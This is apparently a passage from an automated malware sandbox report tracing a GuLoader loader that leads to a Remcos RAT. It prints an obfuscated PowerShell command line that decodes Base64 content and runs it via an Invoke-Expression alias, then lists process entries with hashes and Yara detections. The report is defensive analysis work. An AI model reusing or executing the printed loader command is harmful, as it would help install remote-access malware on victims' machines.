Eddi$ .laqUntaU RovaFracDBri rModauClerPSkanO Pr lNonea mbyR Cin)') ;janey (Infractor 'L.go$BrneGDiscl MonOCalcb .amAOlshlsobe: T,kbB okRStatUj degHellS OmsRMortEA.caTOeco=Mod,$ThiogFriklEkstORe mbIneaAErkllLend: tjer H re CoaM Te.oTripnHjadtSvidePilaRTs riSe iN M ngSemie istRBhutnRumkERede+Both+ D p%Jas $ HunmOmveILnnicFameMGracATr,hCKu s.PancC ksOM.niuBasensamlt') ;$Aabningstidernes=$Micmac[$Brugsret]}$Aroideous208=323081;$Eneboers=29797;janey (Infractor 'Bude$FoerGSas,lAbanOFjerb St,a.alsllign:UtrimFar aSl,kCHorsKSkriLProgeMeso pos=Blen brieGWiike KantTant- .lsCCindOIsacnVelsTFadeeGrubNRenhTW.er Dyne$.uboqUnunU enoADelmDCarpRKlasUBir,pUn mo.heslInteALievr');janey (Infractor 'Ta,r$Polyg Gral P,loUnbrbOpskaSavol Sem:Tan SNon oSg kl rwdcDis rMonaeOutrmunspePi irH.ndsSulf Padd=Amat N.n[U anSnon y HovsAbsetUdpleSpitmUndi.BlanC F eoSkrinEna v Pe ePrefr MurtKl d]Aftg:A lo:KongFSurcr Undo ilim laBKu ea TemsTaboe vi6Fora4 NonSDip.tNga r roi StenBu tg ,ac( Top$DollMTrana TercKonsk Berl AndeMeas)');janey (Infractor 'A hv$AfruGFatnlIndoOFlyeBIsomaDes LRewa:UndeSAdvoY Forn nsaCDeceoGestp v.daT detchirEB.aisMi k Fre = nte Praa[ BssSMagnY.andSBlodTFngseBrugmSter.PesttLangeGa iXPro.tsymp. ordebo bnExpecJuleOD.laD KanIFyrsn E igfutu] Sek:Un.p:FranaEksis VgtC rgli PoliDau..SteggUtereV nitSdcesFre,T Sagr.oqui rinSengg una(Rh d$Nects .ecoErnhlA skCDep rExpaeStramInt.eAfreRBallSBurg)');janey (Infractor 'Lepi$Stj gDruplUngeONud bTi,fA ndsl any:AnarB HypoProvgEnv dOveraForvGMoraeAeronprin= Teg$ M.dSUdtmY IllNHockCBrudO MaiP kemaP thT Co,ETroms E p.VitrsmetauJu,ebBoidsSeveT Botr Di i fhuNMi pG Ver(A tn$DoucAAl aRA,toOLigniBesvd Sk,E RejoDa luPl ySHv,d2Tr k0Blom8styl,Cu h$Elice StiNAareeNon BSpolo ,inEPianR SorSDepu)');janey $Bogdagen;"
                                                                                  Imagebase:0x380000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1963821003.0000000008110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1949177684.00000000054D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.1963956226.000000000C5F3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:04:19:20
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff68dae0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:16
                                                                                  Start time:04:20:01
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                  Imagebase:0x3e0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:20
                                                                                  Start time:04:20:26
                                                                                  Start date:10/03/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe"
                                                                                  Imagebase:0x3e0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >